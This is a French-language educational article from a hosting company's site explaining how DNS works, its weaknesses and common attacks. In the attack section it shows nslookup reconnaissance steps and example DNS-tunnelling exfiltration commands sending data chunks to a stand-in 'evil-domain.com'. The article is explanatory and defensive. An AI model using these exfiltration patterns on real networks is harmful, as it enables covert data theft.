7 octobre 2021

Quel est le systĂšme DNS des noms de domaine ?

Principes de base du fonctionnement du DNS sur Internet et de la sécurité

Explication du systĂšme DNS sur la banniĂšre Internet

Le systĂšme de noms de domaine (DNS) est un composant fondamental du rĂ©seau moderne qui se traduit entre les noms de domaine lisibles par l'homme et les adresses IP (Internet Protocol) sous-jacentes que les appareils connectĂ©s utilisent pour communiquer entre eux. Le DNS est antĂ©rieur au World Wide Web et facilite pratiquement toutes les communications sur Internet, ainsi que d'autres utilisations qui ne pouvaient mĂȘme pas ĂȘtre imaginĂ©es lorsqu'il a Ă©tĂ© dĂ©veloppĂ© au dĂ©but des annĂ©es 80. Cependant, le manque de fonctionnalitĂ©s de sĂ©curitĂ© dans ce protocole rĂ©seau de longue durĂ©e a conduit Ă  de nombreuses vulnĂ©rabilitĂ©s et attaques. Dans cet article, nous rĂ©pondrons Ă  des questions telles que « Qu'est-ce que le DNS ? Â», « Comment fonctionne le DNS ? Â» et "Quels sont les diffĂ©rents types d'enregistrements DNS ?"

Qu'est-ce que le DNS ?

DNS est souvent appelĂ© la version Internet du Pages Jaunes . Autrefois, lorsque vous deviez trouver une adresse professionnelle, vous la cherchiez dans les pages jaunes. Le DNS est exactement comme ça, sauf que vous n'avez pas besoin de rechercher quoi que ce soit - votre ordinateur connectĂ© Ă  Internet le fait pour vous. Voici comment votre ordinateur sait comment trouver Google , ESPN.com ou Managedserver.it.

Pour que deux ordinateurs communiquent sur un rĂ©seau IP, le protocole exige qu'ils aient besoin d'une adresse IP. ConsidĂ©rez une adresse IP comme une adresse postale : pour qu'un ordinateur en "localise" un autre, il doit connaĂźtre le numĂ©ro de l'autre ordinateur. Puisque la plupart des gens se souviennent mieux des noms - www.google.it - que les nombres - 142.250.185.163, nĂ©cessitaient un programme informatique pour traduire les noms en adresses IP.

Le DNS est le plus souvent considĂ©rĂ© dans le contexte du World Wide Web, mais en rĂ©alitĂ©, il existe une recherche DNS derriĂšre presque tous les types de requĂȘtes rĂ©seau, mĂȘme celles qui ne sont pas initiĂ©es par un utilisateur. Les mises Ă  jour logicielles, les applications de mĂ©dias sociaux et mĂȘme les logiciels malveillants atteignent gĂ©nĂ©ralement un nom d'hĂŽte plutĂŽt qu'une adresse IP. De cette façon, si l'adresse IP sous-jacente change, la connectivitĂ© peut toujours ĂȘtre Ă©tablie.

Comment fonctionne le DNS

Le DNS fait tellement partie intégrante d'Internet qu'il est important de comprendre son fonctionnement.

ConsidĂ©rez DNS comme un carnet d'adresses, mais au lieu de mapper les noms des personnes Ă  leurs adresses, le carnet d'adresses mappe les noms d'ordinateurs aux adresses IP. Chaque mappage est appelĂ© un « enregistrement DNS Â». Les clients DNS sur les appareils connectĂ©s atteignent les serveurs DNS pour rĂ©cupĂ©rer ces enregistrements. DiffĂ©rents types d'enregistrements sont utilisĂ©s Ă  des fins diffĂ©rentes. Les navigateurs Web reposent sur un enregistrement de type « A Â», tandis que l'enregistrement « MX Â» indique la direction vers un serveur de messagerie. Voici comment vous pouvez hĂ©berger un site Web avec un fournisseur de services et un service de messagerie avec un autre.

Voici un aperçu de l'enregistrement « A Â» pour varonis.com tel qu'il est vu par un utilitaire de ligne de commande populaire appelĂ© DiG :

Comme vous pouvez le voir dans l'exemple, il est possible d'avoir plusieurs enregistrements pour un seul nom d'hĂŽte ou domaine. Cela peut ĂȘtre utilisĂ© pour fournir une redondance et un Ă©quilibrage de charge.

Internet a beaucoup d'ordinateurs, donc il ne sert Ă  rien de mettre tous ces enregistrements dans un seul gros livre. Au lieu de cela, le DNS est organisĂ© en livres ou domaines plus petits. Les domaines peuvent ĂȘtre trĂšs volumineux, ils sont donc organisĂ©s en plus petits livres, appelĂ©s « zones Â». Aucun serveur DNS ne stocke tous les livres - ce ne serait pas pratique.

Au lieu de cela, DNS fonctionne de maniĂšre distribuĂ©e, avec des millions de serveurs dans le monde travaillant ensemble. Lorsque votre ordinateur souhaite effectuer une recherche DNS, il peut demander au serveur DNS de votre routeur local. Le routeur local effectuera Ă  son tour une requĂȘte « en amont Â» vers un autre serveur DNS, souvent fourni par un fournisseur d'accĂšs Internet. Les requĂȘtes pour un domaine peuvent aller « en amont » jusqu'Ă  ce qu'elles atteignent l'autoritĂ© du domaine ou le « serveur de noms faisant autoritĂ© ». En pratique, les rĂ©sultats sont souvent « mis en cache » Ă  des niveaux infĂ©rieurs pour Ă©viter d'avoir Ă  exĂ©cuter l'intĂ©gralitĂ© du processus pour chaque requĂȘte.

Un serveur de noms faisant autoritĂ© est l'endroit oĂč les administrateurs gĂšrent les noms de serveur et les adresses IP de leurs domaines. Chaque fois qu'un administrateur DNS souhaite ajouter, modifier ou supprimer un nom de serveur ou une adresse IP, il modifie son serveur DNS faisant autoritĂ© (parfois appelĂ© « serveur DNS principal Â»). Il existe Ă©galement des serveurs DNS « esclaves Â» ; ces serveurs DNS conservent des copies des enregistrements DNS pour leurs zones et domaines.

RequĂȘtes DNS, serveurs et types d'enregistrement

Les concepts de base du DNS sont relativement simples, mais au fil des ans, le cÎté technique des choses est devenu de plus en plus complexe. Voici un aperçu de certains des mécanismes internes du systÚme :

Quels sont les types de requĂȘtes DNS ?

Une requĂȘte DNS est le message envoyĂ© par un client Ă  un serveur DNS ou entre deux serveurs DNS. Une requĂȘte DNS peut ĂȘtre l'une des suivantes :

  1. RequĂȘte DNS rĂ©cursive

Dans une requĂȘte DNS rĂ©cursive, un client DNS atteindra un serveur, qui Ă  son tour effectuera des requĂȘtes en amont pour le domaine en question jusqu'Ă  ce qu'un rĂ©sultat soit trouvĂ©. La seule rĂšgle dĂ©finie pour une requĂȘte rĂ©cursive est qu'un rĂ©sultat doit ĂȘtre renvoyĂ©, s'il y en a un. Il peut y avoir une ou des dizaines de rĂ©cursions. Le serveur initial ou mĂȘme le client DNS local peuvent dĂ©jĂ  avoir un rĂ©sultat mis en cache. Une valeur de durĂ©e de vie (TTL) dĂ©termine la durĂ©e pendant laquelle l'un de ces rĂ©sultats peut ĂȘtre mis en cache ; une fois le TTL atteint, le client ou le serveur devra rechercher les rĂ©sultats en amont.

  1. RequĂȘte DNS itĂ©rative

Contrairement aux requĂȘtes DNS rĂ©cursives, les requĂȘtes DNS itĂ©ratives ne voyagent pas en amont. Au lieu de cela, le serveur DNS auquel le client s'adresse fera de son mieux pour rĂ©pondre Ă  la requĂȘte. Sinon, il peut suggĂ©rer un serveur DNS diffĂ©rent, tel qu'un serveur de noms faisant autoritĂ© ou un serveur de noms TLD. Le demandeur continuera ce processus itĂ©ratif jusqu'Ă  ce qu'il trouve une rĂ©ponse ou expire.

Quels sont les types de serveurs DNS ?

Comme dĂ©jĂ  indiquĂ©, DNS est un systĂšme distribuĂ©, ce qui signifie que les serveurs du monde entier travaillent ensemble pour maintenir et fournir des enregistrements DNS. DiffĂ©rents types de serveurs ont des rĂŽles diffĂ©rents au sein du systĂšme global :

  1. DNS récursif

Parfois appelĂ© rĂ©solveur rĂ©cursif, un rĂ©curseur DNS reçoit les requĂȘtes des clients DNS, rĂ©pond si un hit est disponible dans le cache ou atteint un serveur de noms plus haut dans la chaĂźne. Les appels sont souvent traitĂ©s par les FAI, mais il est facile de modifier la configuration DNS d'un ordinateur pour pointer vers une autre source pour des raisons de performances, de sĂ©curitĂ© ou de confidentialitĂ©.

  1. Serveur racine DNS

Comme son nom l'indique, les serveurs racine sont la base Ă  partir de laquelle toute l'infrastructure DNS est construite. Les serveurs racines agissent comme des serveurs de noms faisant autoritĂ© pour les domaines de premier niveau (TLD) tels que « .com » et « .net ». Il y a un problĂšme, cependant, parce que les serveurs racine eux-mĂȘmes sont rĂ©fĂ©rencĂ©s par des noms d'hĂŽte au sein de ces mĂȘmes TLD. Si un client DNS ne peut pas dĂ©terminer vers quel serveur de noms se tourner pour « .net », comment peut-il Ă©ventuellement rĂ©soudre un domaine pleinement qualifiĂ© comme « a.root-servers.net » ? La rĂ©ponse est que les clients DNS et les serveurs de bas niveau sont « amorcĂ©s Â» avec une liste de treize adresses IP de serveur principal. Ces adresses n'ont pas tendance Ă  changer souvent et une seule d'entre elles doit ĂȘtre accessible pour rĂ©parer les autres.

  1. Serveur de noms TLD

Les serveurs de noms de TLD n'ont d'importance que les serveurs racines, car ils savent oĂč aller pour obtenir des rĂ©ponses sur n'importe quel domaine au sein d'un TLD donnĂ©. Lors de la recherche www.managedserver.it , un serveur TLD pour ".com" rĂ©pondra en premier, pointant le client vers le serveur de noms avec les enregistrements pour "managedserver". partie du nom de domaine.

  1. Serveur de noms faisant autorité

Le serveur de noms faisant autoritĂ© est le dernier arrĂȘt pour une requĂȘte DNS. Ce serveur, ou souvent serveur pour des raisons de redondance, est la plus haute autoritĂ© pour un domaine donnĂ©. Cependant, toutes les requĂȘtes DNS n'atteignent pas le serveur de noms faisant autoritĂ©, car des rĂ©sultats mis en cache peuvent ĂȘtre plus proches de la requĂȘte initiale.

Les organisations utilisent Ă©galement souvent le DNS en interne. L'opĂ©ration n'est pas trĂšs diffĂ©rente, sauf que les recherches et les enregistrements DNS restent dans le rĂ©seau de l'entreprise plutĂŽt que sur Internet. C'est ce qu'on appelle le DNS « privĂ© Â» ou « local Â» par opposition au service DNS public.

Quels sont les types d'enregistrements DNS ?

Les enregistrements DNS sont disponibles dans une grande variĂ©tĂ© de types, chacun Ă©tant utilisĂ© Ă  des fins diffĂ©rentes. Voici quelques-unes des plus courantes :

  1. Enregistrement "A" - Utilisation classique du DNS, traduit un domaine en une adresse IPv4.
  2. Enregistrement « AAAA Â» - MĂȘme fonctionnalitĂ© qu'un enregistrement « A Â», mais en utilisant une adresse IPv6 au lieu d'IPv4.
  3. L'enregistrement "MX" - Abréviation de "Mail Exchange", identifie le serveur de messagerie associé au domaine.
  4. Enregistrement « TXT Â» : utilisĂ© Ă  des fins trĂšs diverses, de la preuve de propriĂ©tĂ© du domaine Ă  la signature cryptographique des e-mails pour lutter contre le spam.

Avantages et faiblesses du DNS

Avantages

Il existe de nombreuses bonnes raisons pour lesquelles nous utilisons toujours le DNS aprÚs toutes ces années. Certains des avantages du systÚme comprennent :

  • Il est distribuĂ© et rĂ©silient

Il n'y avait pas beaucoup de domaines utilisés au début d'Internet, il est donc concevable que nous ayons pu nous retrouver avec une seule base de données centrale avec tous les mappages de domaine à IP. Ceci, bien sûr, n'aurait pas permis l'évolutivité nécessaire pour alimenter l'Internet moderne. La nature distribuée du DNS signifie également que le systÚme est résilient ; une panne de courant, un cùble fibre coupé ou une cyberattaque sur un serveur DNS n'interrompra pas le systÚme dans son ensemble.

  • Il est polyvalent et extensible

Les développeurs DNS ont toujours voulu que le protocole soit extensible à mesure que la technologie progressait. Les extensions de la norme DNS d'origine ont apporté de nouvelles fonctionnalités et fonctionnalités tout en maintenant la compatibilité descendante. Au fil des ans, de nouveaux types d'enregistrements, des rÚgles améliorées pour la livraison des paquets DNS et une sécurité améliorée ont été ajoutés.

  • C'est une norme ouverte et bien documentĂ©e

Le DNS n'est pas né de la domination d'un fournisseur particulier ou d'un désir de gagner des parts de marché. L'Internet Engineering Task Force (IETF) publie ouvertement l'ensemble des rÚgles qui composent le protocole, permettant à tout développeur de logiciels d'implémenter le DNS dans ses produits. Il existe de nombreuses implémentations différentes de clients et de serveurs DNS, mais comme elles sont conformes à une norme commune, elles peuvent toutes fonctionner ensemble.

Faiblesses et vulnérabilités

Les premiÚres itérations du systÚme de noms de domaine (DNS) remontent au début des années 80, bien avant l'émergence des menaces modernes de cybersécurité. En conséquence, DNS et de nombreux autres protocoles plus anciens encore utilisés aujourd'hui, tels que ARP et IMCP, n'ont jamais inclus beaucoup de fonctionnalités de sécurité. Au cours des années qui ont suivi, un certain nombre d'extensions et d'atténuations ont été conçues à mesure que de nouvelles menaces sont apparues, mais le DNS est encore souvent abusé par les attaquants.

Du point de vue d'un acteur de la menace, plusieurs caractĂ©ristiques rendent le DNS attrayant :

  • Chaque rĂ©seau l'utilise

Le DNS est omniprĂ©sent. Presque tous les rĂ©seaux informatiques du monde verront des milliers ou des millions de requĂȘtes DNS chaque jour. Bien que cela ne soit pas techniquement nĂ©cessaire pour qu'un rĂ©seau IP fonctionne, le blocage ou la limitation du DNS n'est tout simplement pas pratique, donc presque tous les pare-feu de la planĂšte sont configurĂ©s pour autoriser le trafic sortant sur le port 53. Cela signifie que les attaquants n'ont pas seulement un sortir d'un rĂ©seau compromis, mais il y a aussi beaucoup de trafic lĂ©gitime avec lequel ils peuvent fusionner.

  • Il n'y a pas d'authentification

Comme beaucoup d'autres premiers protocoles rĂ©seau, DNS n'a jamais inclus de mĂ©canisme d'authentification. Cela signifie que dans le protocole DNS principal, il n'est pas possible d'ĂȘtre sĂ»r qu'un certain rĂ©sultat est authentique. Les attaquants en ont profitĂ© avec toute une gamme d'opportunitĂ©s d'attaques d'usurpation d'identitĂ© et d'empoisonnement qui ciblent tout, des machines individuelles aux vastes pans de l'ensemble d'Internet.

Le manque d'authentification dans le DNS a fait la une des journaux en 2008 lorsque le chercheur en sĂ©curitĂ© Dan Kaminsky a dĂ©couvert une Ă©norme vulnĂ©rabilitĂ© qui aurait pu permettre aux attaquants d'empoisonner le cache de presque tous les serveurs DNS utilisĂ©s Ă  l'Ă©poque. . Le rĂ©sultat Ă©tait que mĂȘme avec trĂšs peu de compĂ©tences techniques, un attaquant pouvait tromper des serveurs DNS lĂ©gitimes en leur faisant envoyer de fausses informations IP pour des domaines importants comme une banque ou une institution gouvernementale.

Face Ă  la menace de faux enregistrements DNS faisant des ravages dans la communautĂ© Internet, les fournisseurs de services et les organismes de normalisation se sont associĂ©s pour adopter ce qu'on appelle les extensions de sĂ©curitĂ© du systĂšme de noms de domaine (DNSSEC). DNSSEC utilise la cryptographie Ă  clĂ© publique pour signer numĂ©riquement les rĂ©sultats DNS, garantissant que la rĂ©ponse Ă  une requĂȘte est bien authentique.

  • Il n'y a pas de cryptage non plus

Les requĂȘtes DNS et leurs rĂ©ponses sont envoyĂ©es en texte clair, ce qui signifie que n'importe qui sur le rĂ©seau peut les voir avec un outil comme Wireshark . Cela prĂ©sente des problĂšmes potentiels de confidentialitĂ©, car cela signifie que vos collĂšgues, votre patron ou mĂȘme votre FAI peuvent dire avec quels domaines vous avez interagi. Cela est Ă©galement vrai pour les sites Web qui tirent parti du cryptage SSL / TLS ; les donnĂ©es rĂ©elles transfĂ©rĂ©es entre le site et votre ordinateur peuvent ne pas ĂȘtre visibles, mais cette requĂȘte DNS initiale qui vous a donnĂ© l'adresse IP du site en premier lieu l'est.

Deux approches concurrentes ont Ă©tĂ© avancĂ©es pour envelopper le trafic DNS avec une couche de cryptage lorsqu'il traverse un rĂ©seau : DNS sur HTTPS (DoH) et DNS sur TLS. Quelle approche utiliser - et si le DNS doit Ă©galement ĂȘtre cryptĂ© en premier lieu - est sujet de dĂ©bats houleux .

Types d'attaques DNS

Attaques de reconnaissance DNS

Le DNS concerne uniquement les informations qui, du point de vue d'un attaquant, peuvent ĂȘtre un outil prĂ©cieux. Les requĂȘtes DNS peuvent ĂȘtre utilisĂ©es pour cartographier l'infrastructure rĂ©seau d'une victime en rĂ©vĂ©lant hĂŽte en direct sur un rĂ©seau , en dĂ©couvrant les noms d'hĂŽte des cibles de grande valeur telles que les serveurs de messagerie et les fichiers, et en fournissant des indices sur les applications et les services utilisĂ©s. Vous pouvez effectuer votre mission de reconnaissance DNS locale simplement en suivant les instructions ci-dessous :

Si vous avez un ordinateur Windows, exĂ©cutez les commandes suivantes telles quelles ; si vous ĂȘtes un utilisateur Linux, vous pouvez rechercher des commandes correspondantes.

  1. Ouvrez une invite de commande (tapez Ctrl + esc, les lettres "cmd", puis entrez).
  2. Tapez ipconfig
  3. Vous verrez le domaine DNS dans lequel vous vous trouvez (suffixe DNS spécifique à la connexion), votre adresse IP et un tas d'autres choses. Vous voudrez vous y référer.
  4. Tapez nslookup [adresse IP] Vous verrez le nom du serveur DNS qui répond et, si le nom est connu, l'enregistrement DNS qui répertorie le nom et l'adresse IP.
  5. nslookup –type = soa [votre domaine] Cette commande renvoie votre serveur DNS faisant autoritĂ©, cela ne serait pas utile si vous essayiez d'infiltrer un rĂ©seau.
  6. nslookup –type = MX [votre domaine] Cette commande renvoie tous les serveurs de messagerie sur votre domaine local, au cas oĂč vous voudriez pirater les serveurs de messagerie et ne savez pas oĂč ils se trouvent.

Comme nous l'avons dĂ©jĂ  appris, la plupart des rĂ©seaux ont beaucoup de requĂȘtes DNS en cours tout le temps. Pour de nombreux produits de sĂ©curitĂ© standard et solutions de surveillance de rĂ©seau, les requĂȘtes utilisĂ©es par un attaquant pour Ă©numĂ©rer un rĂ©seau ne sont pas trĂšs diffĂ©rentes de toutes les autres requĂȘtes lĂ©gitimes. 

Piratage DNS pour rediriger le trafic

L'absence d'authentification dans le protocole DNS d'origine donne aux attaquants un Ă©norme avantage car cela signifie que les requĂȘtes et les rĂ©ponses peuvent ĂȘtre manipulĂ©es ou falsifiĂ©es dans de nombreux endroits diffĂ©rents, de la machine locale aux rĂ©solveurs DNS mondiaux.

Une attaque de rĂ©seau local classique consiste Ă  enchaĂźner Usurpation d'ARP avec un serveur DNS non autorisĂ©. En cas de succĂšs, les autres machines du rĂ©seau achemineront leurs requĂȘtes DNS vers un serveur contrĂŽlĂ© par l'attaquant. L'attaquant peut alors renvoyer ses adresses IP pour ces requĂȘtes au lieu de l'adresse lĂ©gitime. Sans les mesures d'attĂ©nuation en place, un utilisateur pourrait saisir un domaine comme example.com, voir une page se charger et ne jamais avoir aucune indication qu'il communiquait rĂ©ellement avec un faux malveillant.

Les attaquants peuvent Ă©galement utiliser diverses techniques pour empoisonner le cache des serveurs DNS lĂ©gitimes . Cela se produit gĂ©nĂ©ralement lorsque les organisations exĂ©cutent leur propre rĂ©curseur DNS local ; une attaque rĂ©ussie d'empoisonnement du cache sur un grand fournisseur de DNS public pourrait avoir un impact mondial, de sorte que ces fournisseurs ont tendance Ă  ĂȘtre trĂšs soucieux de la sĂ©curitĂ©. Cependant, mĂȘme les grands fournisseurs ils ne sont pas Ă  l'abri des vulnĂ©rabilitĂ©s .

Si un attaquant réussit à usurper une réponse DNS, il peut transformer le cache du serveur DNS destinataire en un enregistrement empoisonné. Alors, comment cela aide-t-il les attaquants?

Voici un exemple : disons qu'un attaquant apprend que votre organisation utilise une application externe pour quelque chose d'important, comme des dĂ©penses. S'ils empoisonnent le serveur DNS de votre organisation afin qu'il envoie chaque utilisateur au serveur de l'attaquant, tout ce qu'ils ont Ă  faire est de crĂ©er une page de connexion d'apparence lĂ©gitime et les utilisateurs entreront leurs informations d'identification. Ils pourraient mĂȘme transfĂ©rer le trafic vers le serveur rĂ©el (agissant comme un « homme du milieu Â»), afin que personne ne le remarque. L'attaquant peut ensuite essayer ces informations d'identification sur d'autres systĂšmes, les vendre ou simplement cĂ©lĂ©brer avec un rire mĂ©chant.

Utiliser DNS comme canal secret

Étant donnĂ© que le trafic DNS sortant n'est pratiquement jamais bloquĂ©, et a tendance Ă  ĂȘtre important, l'utilisation du DNS pour l'exfiltration de donnĂ©es ou les communications secrĂštes est devenue la tactique prĂ©fĂ©rĂ©e de nombreux adversaires sophistiquĂ©s. L'objectif des attaquants est de fusionner avec tout ce trafic rĂ©seau lĂ©gitime via une technique appelĂ©e Tunnellisation DNS . Dans certains cas, un attaquant utilisera simplement le protocole DNS de maniĂšre non prĂ©vue pour le transfert de donnĂ©es. Cela peut toutefois ĂȘtre risquĂ©, car cela pourrait gĂ©nĂ©rer des pics importants ou des modĂšles de trafic inhabituels qu'une organisation bien prĂ©parĂ©e peut rapidement remarquer.

Une approche plus sophistiquĂ©e implique une mauvaise utilisation de l'infrastructure DNS elle-mĂȘme. L'attaquant mettra en place un domaine DNS (evil-domain.com, par exemple) sur Internet et crĂ©era un serveur de noms faisant autoritĂ©. Ensuite, sur l'hĂŽte compromis, l'attaquant peut utiliser un programme qui divise les donnĂ©es en petits morceaux et les insĂšre dans une sĂ©rie de recherches, comme ceci :

  • nslookup My1secret1.evil-domain.com
  • nslookup est1que1je1sais.evil-domain.com
  • nslllookup how2steal1data.evil-domain.com

Le serveur DNS de corp.com recevra ces requĂȘtes, se rendra compte que les rĂ©sultats ne sont pas dans son cache et relaiera ces requĂȘtes au serveur de noms faisant autoritĂ© de evil-domain.com. L'attaquant attend ce trafic, puis exĂ©cute un programme sur le serveur de noms faisant autoritĂ© pour extraire la premiĂšre partie de la requĂȘte (toute avant evil-domain.com) et la rĂ©assembler. À moins que votre organisation n'inspecte les requĂȘtes effectuĂ©es par les serveurs DNS, elle ne se rendra peut-ĂȘtre jamais compte que leurs serveurs DNS ont Ă©tĂ© utilisĂ©s pour exfiltrer des donnĂ©es.

Et encore plus de types d'attaques !

La liste ci-dessus n'est en aucun cas une liste complĂšte de toutes les attaques DNS possibles. Le protocole a Ă©tĂ© abusĂ© pour tout, de Campagnes DDoS al surveillance secrĂšte des internautes . Des attaquants ont rĂ©cemment Ă©tĂ© observĂ©s modifier la configuration DNS dans diffĂ©rentes variĂ©tĂ©s de routeurs domestiques pour propager des logiciels malveillants . Les acteurs malveillants et les chercheurs en sĂ©curitĂ© sont constamment Ă  la recherche de nouvelles vulnĂ©rabilitĂ©s et il est peu probable que leur attention se dĂ©place de si tĂŽt.

Le DNS existe depuis longtemps et chaque ordinateur connectĂ© Ă  Internet en dĂ©pend. Les attaquants utilisent dĂ©sormais DNS pour la reconnaissance externe et interne, pour dĂ©tourner le trafic et crĂ©er des canaux de communication secrets. Heureusement, surveillance des serveurs DNS e application de l'analyse de sĂ©curitĂ© , bon nombre de ces attaques peuvent ĂȘtre dĂ©tectĂ©es et Ă©vitĂ©es.

Informations sur l'auteur

Vous avez des doutes ? Vous ne savez pas par oĂč commencer ? Contactez-nous !

Nous avons toutes les réponses à vos questions pour vous aider à faire le bon choix.

Discute avec nous

Discutez directement avec notre support avant-vente.

0256569681

Contactez-nous par téléphone pendant les heures de bureau 9h30 - 19h30

Contactez-nous en ligne

Ouvrez une demande directement dans l'espace contact.

INFORMATIONS

Managed Server Srl est un acteur italien leader dans la fourniture de solutions systÚme GNU/Linux avancées orientées vers la haute performance. Avec un modÚle d'abonnement peu coûteux et prévisible, nous garantissons que nos clients ont accÚs à des technologies avancées en matiÚre d'hébergement, de serveurs dédiés et de services cloud. En plus de cela, nous proposons des conseils systÚme sur les systÚmes Linux et une maintenance spécialisée en SGBD, sécurité informatique, Cloud et bien plus encore. Nous nous distinguons par notre expertise dans l'hébergement de CMS Open Source de premier plan tels que WordPress, WooCommerce, Drupal, Prestashop, Joomla, OpenCart et Magento, soutenus par un service d'assistance et de conseil de haut niveau adapté aux administrations publiques, aux PME et à toutes tailles.

Red Hat, Inc. dĂ©tient les droits de Red HatÂź, RHELÂź, RedHat LinuxÂź et CentOSÂź ; AlmaLinuxℱ est une marque commerciale d'AlmaLinux OS Foundation ; Rocky LinuxÂź est une marque dĂ©posĂ©e de la Rocky Linux Foundation ; SUSEÂź est une marque dĂ©posĂ©e de SUSE LLC ; Canonical Ltd. dĂ©tient les droits sur UbuntuÂź ; Software in the Public Interest, Inc. dĂ©tient les droits sur DebianÂź ; Linus Torvalds dĂ©tient les droits sur LinuxÂź ; FreeBSDÂź est une marque dĂ©posĂ©e de la FreeBSD Foundation ; NetBSDÂź est une marque dĂ©posĂ©e de la Fondation NetBSD ; OpenBSDÂź est une marque dĂ©posĂ©e de Theo de Raadt. Oracle Corporation dĂ©tient les droits sur OracleÂź, MySQLÂź et MyRocksÂź ; PerconaÂź est une marque dĂ©posĂ©e de Percona LLC ; MariaDBÂź est une marque dĂ©posĂ©e de MariaDB Corporation Ab ; REDISÂź est une marque dĂ©posĂ©e de Redis Labs Ltd. F5 Networks, Inc. dĂ©tient les droits sur NGINXÂź et NGINX PlusÂź ; VarnishÂź est une marque dĂ©posĂ©e de Varnish Software AB. Adobe Inc. dĂ©tient les droits sur MagentoÂź ; PrestaShopÂź est une marque dĂ©posĂ©e de PrestaShop SA ; OpenCartÂź est une marque dĂ©posĂ©e d'OpenCart Limited. Automattic Inc. dĂ©tient les droits sur WordPressÂź, WooCommerceÂź et JetPackÂź ; Open Source Matters, Inc. dĂ©tient les droits sur JoomlaÂź ; Dries Buytaert dĂ©tient les droits sur DrupalÂź. Amazon Web Services, Inc. dĂ©tient les droits sur AWSÂź ; Google LLC dĂ©tient les droits sur Google Cloudℱ et Chromeℱ ; Facebook, Inc. dĂ©tient les droits sur FacebookÂź ; Microsoft Corporation dĂ©tient les droits sur MicrosoftÂź, AzureÂź et Internet ExplorerÂź ; La Fondation Mozilla dĂ©tient les droits sur FirefoxÂź. ApacheÂź est une marque dĂ©posĂ©e de The Apache Software Foundation ; PHPÂź est une marque dĂ©posĂ©e du groupe PHP. CloudFlareÂź est une marque dĂ©posĂ©e de Cloudflare, Inc. ; NETSCOUTÂź est une marque dĂ©posĂ©e de NETSCOUT Systems Inc. ; ElasticSearchÂź, LogStashÂź et KibanaÂź sont des marques dĂ©posĂ©es d'Elastic NV. Ce site n'est affiliĂ©, sponsorisĂ© ou autrement associĂ© Ă  aucune des entitĂ©s mentionnĂ©es ci-dessus et ne reprĂ©sente aucune de ces entitĂ©s de quelque maniĂšre que ce soit. Tous les droits sur les marques et noms de produits mentionnĂ©s sont la propriĂ©tĂ© de leurs titulaires respectifs des droits d'auteur. Toutes les autres marques mentionnĂ©es appartiennent Ă  leurs titulaires. MANAGED SERVERÂź est une marque dĂ©posĂ©e au niveau europĂ©en par MANAGED SERVER SRL Via Enzo Ferrari, 9 62012 Civitanova Marche (MC) Italie.

Retour en haut de page